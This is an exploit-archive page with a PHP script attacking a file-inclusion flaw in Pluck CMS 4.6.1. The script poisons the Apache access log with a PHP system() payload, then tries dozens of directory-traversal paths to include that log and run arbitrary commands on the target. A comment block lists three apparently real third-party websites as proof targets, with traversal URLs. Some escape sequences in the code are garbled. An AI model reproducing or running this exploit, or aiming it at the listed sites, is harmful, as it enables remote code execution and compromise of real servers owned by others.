[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit
# Published : 2009-03-23
# Author : Alfons Luja
# Previous Title : Codice CMS 2 Remote SQL Command Execution Exploit
# Next Title : Syzygy CMS 0.3 LFI/SQL Command Injection Exploit
<?php
/*
pluck v 4.6.1 LFI exploit
autor : Alfons Luja
Vuln is in datamodulesblogmodule_pages_site.php
...
$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
//Check if post exists, and include information
if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
include('data/settings/modules/blog/posts/'.$_GET['post']);
$module_page['viewpost'] = $post_title;
}
}
...
Nothing to comment ;x
Greetings: For all friends and obvious for me ;D
pr00f:
http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/
if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]n");
set_time_limit(0);
error_reporting(0);
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];
//add something if not w00rking ;x
$shell = array(
"<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/access.log",
"../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../../apache/logs/access.log",
"../var/log/httpd/access.log",
"../../var/log/httpd/access.log",
"../../../var/log/httpd/access.log",
"../../../../var/log/httpd/access.log",
"../../../../../var/log/httpd/access.log",
"../../../../../../var/log/httpd/access.log",
"../../../../../../../var/log/httpd/access.log",
"../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../../var/log/httpd/access.log",
"../var/log/apache/access.log",
"../../var/log/apache/access.log",
"../../../var/log/apache/access.log",
"../../../../var/log/apache/access.log",
"../../../../../var/log/apache/access.log",
"../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../var/log/apache/access.log",
"../usr/local/apache2/logs/access.log",
"../../usr/local/apache2/logs/access.log",
"../../../usr/local/apache2/logs/access.log",
"../../../../usr/local/apache2/logs/access.log",
"../../../../../usr/local/apache2/logs/access.log",
"../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../../usr/local/apache2/logs/access.log",
);
function _hdr($int){ //Mia?3o nie by?| file_get_contents
global $shell,$host,$path;
$header .= "GET /$host/$path/$shell[$int] HTTP/1.1rn";
$header .= "Host: $hostrn";
$header .= "User-Agent: _echo [ru] (Win6.66; @)rn";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$header .= "Accept-Language: en-us,en;q=0.5rn";
$header .= "Accept-Encoding: gzip,deflatern";
$header .= "Connection: closernrn";
return $header;
}
function _inject($hosts,$ports){
$hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
if(!$hnd) die("Injection errr $errstrn");
fwrite($hnd,_hdr(0));
fclose($hnd);
}
function _result($data){
$ret = explode(' e[Ho_trip ',$data);
if($ret[1] != ""){
for($i = 1;$i<count($ret);$i++){
$ret_2 = explode(' d34th_trip',$ret[$i]);
if($i - count($ret) == -1){
if($ret_2[0] != ""){
echo($ret_2[0]);
} else {
die("Exploit failed!!n");
}
}
}
}
}
function _exploit($hosts,$paths){
global $shell;
$rets = "";
$count = count($shell);
for($i=1;$i<$count;$i++){
$tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
_result($tab);
}
}
echo("---- pluck v 4.6.1 -----nn".
"Autor: Alfons Lujan".
"Target: $hostn".
"Path: $pathn".
"Port: $portn".
"COM: $commandn".
"Ex: poc.php www.target.com 80 pluck "dir"nn");
_inject($host,$port);
_exploit($host,$path);
?>
# www.Syue.com [2009-03-23]